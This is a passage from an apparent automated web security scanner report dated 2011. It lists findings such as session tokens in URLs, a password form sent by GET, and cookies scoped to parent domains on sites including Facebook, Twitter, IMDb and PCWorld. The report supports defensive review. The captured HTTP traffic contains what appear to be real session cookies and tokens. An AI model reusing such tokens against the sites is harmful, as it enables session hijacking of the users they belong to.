Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 12 May 2011 13:31:35 GMT
Connection: keep-alive

6.2. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /ps/ifr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ps/ifr?container=friendconnect&mid=1&nocache=0&view=profile&parent=http%3A%2F%2Forangeorb.blogspot.com%2F&url=http%3A%2F%2Fwww.google.com%2Ffriendconnect%2Fgadgets%2Fmembers.xml&communityId=09528749658452737714&caller=http%3A%2F%2Forangeorb.blogspot.com%2F2011%2F05%2Fplanets-align-on-friday-13th-and.html&rpctoken=1027267470&locale=en_US HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml&container=peoplesense&parent=http://orangeorb.blogspot.com/&mid=1&view=profile&libs=google.blog&d=0.558.7&lang=en&country=US&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html#st=e%3DAOG8GaDDe54RCyTIdvRBkQ39yp9qA3IJeoHmEAvOV4H1f8Ot8jM7xfdyT0cI4mYEVWgV47OzwlcOMaXNDlmDu2SeV5zRCqmd0EaWjnFj535lHWXDnTPNQ8FjgUZHb6z3L%252FYmzyXeJLyT7%252B3k7Wii71rrIOzy4f6Wx5%252BUWOML6a9DmcAmUrtRqmE2%252BD3yjSKo6iaczxQ6FH3XrmW43XIOCCkNgi%252F2FUhYjmc5tAAOHqezojB46Oa5l8pNRatx2K9yceCfORyS%252F%252BKQyZIyazwECyM3Nz1c%252B2o49WcygQ5DpubP1gco08c6sMg%253D%26c%3Dpeoplesense&rpctoken=1027267470&
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 13:32:50 GMT
Expires: Thu, 12 May 2011 13:32:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 1015

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-o
...[SNIP]...
6.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<span class="global_rpx_login_text"><a class="rpxnow" onclick="return false;" href="https://login.courierpress.com/openid/v2/signin?token_url=http%3A%2F%2Fwww.courierpress.com%2Faccounts%2Fauth%2F?previous=/news/2011/may/12/heder-here-in-this-spp-ppppp/">Register or log in using your account on these websites.</a>
...[SNIP]...
6.4. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=116628718381794&app_id=116628718381794&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2f44d4d1%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfbcf69398%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df9a216678%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df324a3981c%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df5c90ca8c%26origin%3Dhttp%253A%252F%252Fmashable.com%252Ff7ed6dd3c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df36ad9bf08&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f324a3981c&origin=http%3A%2F%2Fmashable.com%2Ff7ed6dd3c&relation=parent&transport=postmessage&frame=f36ad9bf08
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.63.106
X-Cnection: close
Date: Thu, 12 May 2011 13:28:41 GMT
Content-Length: 0

7. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

POST /pcworldconnect/comment_registration HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 111

callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A582A284CD97C03D88D1B381CBB00A78; Path=/
Vary: Accept-Encoding
Content-Length: 6223


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...
8. Cookie scoped to parent domain  previous  next
There are 84 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

8.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=reganlee&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=4&clientsource=TWITTERINC_WIDGET&1305207062912=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1304617828.1304721594.4; k=173.193.214.243.1305161327073854

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305207166-55904-42371
X-RateLimit-Limit: 150
ETag: "f16b5231d379a8faccd3bcb746c7a175"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 13:32:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01698
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 0ea1ebd7e3c3292a1466a749293e9011989f70f4
X-RateLimit-Reset: 1305210664
Set-Cookie: original_referer=Vs%2BEmu1btvuAmQsknyZNdVheq0tL9VpNzq2cJ7f%2Frku5HhKsM0INw8sY%2FgQVZoF0ZSkQVzHgBByWAa84JbboQ%2FY%2BxV5zsEAQMgn2qZyQ36Y%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK3WaOQvAToHaWQiJWUxNWMxZGZmNGM4NjYx%250AN2Q1NGM2MzhmNzhiM2MxODMzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--fa39a0ccad9bf49b70a696e63158d18af30456d6; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 7125

TWTR.Widget.receiveCallback_1([{"text":"Review of book Insight http:\/\/orangeorbreview.blogspot.com\/2011\/05\/book-review-insight.html","id_str":"68512311291289601","created_at":"Thu May 12 03:06:22
...[SNIP]...
8.2. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850472&migRandom=845927450&migTagDesc=Cingular&migAtlSA=286444146&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QJT9qC10CWN|N10CXL|U10JLR; NXCLICK2=011QJT9qNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiExecutivesData_NX_NonSecure!y!B3!JLR!Hfl; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:00 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Tue, 05-Jun-12 13:34:00 GMT; domain=.mookie1.com
Set-Cookie: session=1305207240|1305207240; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;
8.3. http://www.imdb.com/title/tt0758746/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.imdb.com
Path:   /title/tt0758746/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /title/tt0758746/ HTTP/1.1
Host: www.imdb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Server
Cache-Control: private
Cneonction: close
Content-Type: text/html
Set-Cookie: uu=BCYoEYVRn4Z080oVMyaiqkqVil4NObOLHdXg6V5nGFmrKaSp0r5qR1B2q9QdB7DhaW1bB8f4YSIcdmATWdaiYxq_IKR6HKOfkXgDQfVNYlQiBpSUrIq7tamZGfahcbUG9demse85k_CYY6GSxnL7TXGOTdF22fYw9tuZoqsJ96-9rbgaeJ1YzXUvXfDBmlNbH7O2NATYg9Gj1v-3XgpM4a7BxgwwkkhBCdF9BCMNauUPDHvyMm6Wd_QvKZjUSKBxpz_0SyBElOdhtkg2XpExQVhTtg;expires=Thu, 30 Dec 2037 00:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=x1X0LC0cCNNUopm1JgkB7wCmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupZmeM2jsk9fJ9HNKeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=5DCTg6yZP2fcEVMbF0nxoAiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9gaIiSL/CSSbf6WwAmZspee2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=Qy5PblGX7FQYyXU8oLHhYQiOAiSO2RITtsmaRI3KISQNijEn/noBF47ZEhQoWVIEjtkkY9l9kiSN/yWjjd13MsmZspeu2SSyblESJI7vJDOO2RIkjvkSJI7ZEmTOiWIUg=;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=lCczZSsnIliq67dpM+chZACmW+248W26o5HlqiOSHqmTom7pgKHNGbCxbbqm1js64JFtupbHGr/ThyscN9HNKfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=QkXpKjI6/xJZJiwqwOYA/gbGfbqgkW2NmIHl2qOCXrojwk650DJ+iaCRbYoGES2aoJFb/fcWXbqj05s5t9HNyfCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: cs=7FXQMV6N2neppbMXfWZiOwenOqqgkW26kBl9MsPifomjkj6ZoDHOqZCRbbqXx+36gJFtjOSnGIqjpggpN9HNOeCRWyxAGW26oKdbraCRbbqgsW26oJFt+uDBHYqg==;expires=Fri, 13 May 2011 07:00:00 GMT;path=/;domain=.imdb.com
Set-Cookie: session-id=864-5207130-5211698;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Set-Cookie: session-id-time=1462887130;path=/;domain=.imdb.com;expires=Tue, 10 May 2016 06:32:10 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Content-Length: 93623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
8.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-33-35_10260675261305207215; expires=Tue, 10-May-2016 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10260675261305207215; expires=Thu, 12-May-2011 13:48:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
8.5. http://a.tribalfusion.com/displayAd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.3&th=22201705828 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=atnqu6riIfG8BIYQi6b2JpHNWw7ip4NZdMPogw5vkkBn0T3HQtWowoRsSYTvmJjwm2SMTGwMWJBZdTM0WowKoZd3ZdtDgvWRTSxb51PnuxdHM8eiSL9lvR1WtoaiLWSfwZcxgXSKCG9Y0Kw3HbErnPOAcmmyZb9BdGZdLFCrZdtc2SlpZaQShRDVibPiyAZaHXnbFSWKqW2c9GHZcgZb1bfrQPOZc79iGEIAeZaKxuMesjBpjPhIW3jZdrZcZb57ZdwUyA3f8oft8bsQqHxZditEHY8Go6loyEyd6emb2KgVMDZaSROVL7jrIBLwOW0FePwSPOb9iFBayK9baZdItGffDeBcdrAJQAF8dDr6N9I1xsdcyeNohe6WxZaIeRvUOtnZaJEEQcLbaOZdiwniS9EvhZbSyZaZcghUZcgGbxqDNf5ngoUqMWEeiM5noywW24WcjDVuHPkkvlXJGyMC4TrsZbMUcq6Zd53IcMK3gQuZcGZd6MSh6vQbNHIbZaZb2ZdJZaQv6KiLRhYvKaVZcZbioaEgxIR13pqA9J2f7gDe6dG6pyeZdxZcT8lgw9sLCpLcHkU1hDpZcssu1YmlDt8gSFUwgZbWaEOGxjvFFlA79d95Zakwg6PhCavDD6gwlnZaLR69xjHI8TcVXBKDdW65qTsgoRqDMCIVuKDh3ZaO97l3AvagYgdC2bIYMtxq4ZcZdZar98q61x0ZbgFGbyxK8OZbn09FGJCZbD3CjTlFZcpOh2bQvFKLlj7Ndy6eftkfphKgZbNhB137F7Yki4flK

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Thu, 12 May 2011 13:29:46 GMT
Last-Modified: Sun, 08 May 2011 10:17:40 GMT
Expires: Wed, 10 Aug 2011 13:29:46 GMT
Set-Cookie: ANON_ID=a1nqm7MwTmfSZatQmnFagc0XlhnLyH4bI8nZa7IRPWr8BFn2pJBlu031Wvv7XyJPu60syTWgSvuQue5bZbhh5imWAQpFpts5USfTR9F2NQ1FZdl3ClkEghZaEJyVBZcro32AqvYrLX1h61jHZc3nvZcZdj6AXfJZccZavZaDPxqCZdhQjW7D235l25ZdgrXEAZaGTfxsV6EX6tc99X7tMTovbNErYkXsCDf4drTi5IvRHOBKjPKyhhmx6QSBBRpZcFAZdHAwgD5tpjq02SOT0Zd051F09IqspXQnesfZa61EplM2oZcxiUFfI12WRYiTjQNpiluxaZdPl0EWoJbLQSiuyJZcuv6NVsBdT3fm7KoJqN6lBClgXAo11eYOqD3vwBjvs4WDbexxNtBy2wXoVZb3XEqYZdc4NCqqMnZbTwLP4V2F9re2tZb7D4qG2Px9QfL6hF7WUrMX7fiVQMrueBcyO1KLSUtDPiJc8aKjZa8myH0yGqcaUaF4xBZdKyLSrJExUKacMNB9mZbAY6xiancxnLeejw3GpWUyZaVe3Ejer8CQx43nrcfOCZdYAKS3037PgMrteZcbNg3Kea4gt3OkKoVc09Za9AFMgGej8oIq1JZaeBSttifn3O1480LT6nx2nNGxa6Md6MF67YRlZdxE7p1WY9iNjt8OpwjFRbMnU64M2EUcUmM4jy9hlKThdOJtRj25o4IeMxkJ2Ngxh7DZdamYWOZd1FwdACEwPDXpRgQcIDdbTaukZaeO1Co7GpZbHdY0eTL; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:29:46 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
